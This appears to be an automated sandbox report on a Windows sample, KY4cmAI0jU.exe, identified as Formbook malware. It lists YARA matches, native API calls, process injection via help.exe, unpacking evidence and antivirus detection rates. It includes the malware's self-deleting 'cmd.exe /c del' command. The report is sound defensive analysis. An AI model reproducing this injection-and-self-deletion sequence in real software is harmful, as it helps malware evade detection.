Source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0.2.KY4cmAI0jU.exe.2170000.3.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.KY4cmAI0jU.exe.2170000.3.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 1.1.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 1.2.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0.2.KY4cmAI0jU.exe.2170000.3.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.KY4cmAI0jU.exe.2170000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00418300 NtClose,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_0041827B NtCreateFile,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_004182FD NtClose,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_004183AB NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B098F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B09860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B09840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B09910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B09A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B09A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B09A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B095D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B09540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B09660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B097A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B09780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B09FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B09710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B098A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B09820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B0B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B099D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B09950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B09A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B09A10 NtQuerySection,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B0A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B09B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B095F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B0AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B09520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B09560 NtWriteFile,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B096D0 NtCreateKey,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B09610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B09670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B09650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B09730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B0A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B09770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B0A770 NtOpenThread,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_2_00B09760 NtOpenProcess,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_1_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_1_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_1_00418300 NtClose,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_1_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_1_0041827B NtCreateFile,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_1_004182FD NtClose,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 1_1_004183AB NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F39A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F39860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F39840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F399A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F39910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F396E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F396D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F39660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F39650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F39FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F39780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F39710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F395D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F39540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F39A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F39A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F39A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F39A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F3A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F39B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F398F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F398A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F3B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F39820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F399D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F39950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F39670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F39610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F397A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F3A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F39770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F39760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F39730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F3A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F395F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F39560 NtWriteFile,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F3AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F39520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_005781D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_00578280 NtReadFile,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_00578300 NtClose,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_005783B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_0057827B NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_005782FD NtClose,
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_005783AB NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 0_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: String function: 00419F80 appears 40 times
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: String function: 00ACB150 appears 136 times
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: String function: 0041A0B0 appears 38 times
          Source: C:\Windows\SysWOW64\help.exe Code function: String function: 02EFB150 appears 145 times
          Source: KY4cmAI0jU.exe, 00000000.00000003.213687683.0000000009946000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs KY4cmAI0jU.exe
          Source: KY4cmAI0jU.exe, 00000001.00000002.266447217.0000000000D4F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs KY4cmAI0jU.exe
          Source: KY4cmAI0jU.exe, 00000001.00000002.266145503.0000000000A44000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameHelp.Exej% vs KY4cmAI0jU.exe
          Source: KY4cmAI0jU.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.KY4cmAI0jU.exe.2170000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.KY4cmAI0jU.exe.2170000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.KY4cmAI0jU.exe.2170000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.KY4cmAI0jU.exe.2170000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@13/8
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_01
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeFile created: C:\Users\user\AppData\Local\Temp\nssF13E.tmpJump to behavior
          Source: KY4cmAI0jU.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: KY4cmAI0jU.exeVirustotal: Detection: 34%
          Source: KY4cmAI0jU.exeMetadefender: Detection: 17%
          Source: KY4cmAI0jU.exeReversingLabs: Detection: 41%
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeFile read: C:\Users\user\Desktop\KY4cmAI0jU.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\KY4cmAI0jU.exe 'C:\Users\user\Desktop\KY4cmAI0jU.exe'
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeProcess created: C:\Users\user\Desktop\KY4cmAI0jU.exe 'C:\Users\user\Desktop\KY4cmAI0jU.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\KY4cmAI0jU.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeProcess created: C:\Users\user\Desktop\KY4cmAI0jU.exe 'C:\Users\user\Desktop\KY4cmAI0jU.exe'
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\KY4cmAI0jU.exe'
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: wntdll.pdbUGP source: KY4cmAI0jU.exe, 00000000.00000003.213745090.00000000099C0000.00000004.00000001.sdmp, KY4cmAI0jU.exe, 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, help.exe, 00000006.00000002.481376973.0000000002FEF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: KY4cmAI0jU.exe, help.exe
          Source: Binary string: help.pdbGCTL source: KY4cmAI0jU.exe, 00000001.00000002.266136705.0000000000A40000.00000040.00000001.sdmp
          Source: Binary string: help.pdb source: KY4cmAI0jU.exe, 00000001.00000002.266136705.0000000000A40000.00000040.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Unpacked PE file: 1.2.KY4cmAI0jU.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 0_2_73752F60 push eax; ret
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_0041C9AD push eax; ret
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_0040D291 push ebp; iretd
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_0041B3C5 push eax; ret
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_0040C394 pushad ; ret
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_0041B47C push eax; ret
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_0041B412 push eax; ret
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_0041B41B push eax; ret
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe | Code function: 1_2_00414E45 push ebp; iretd
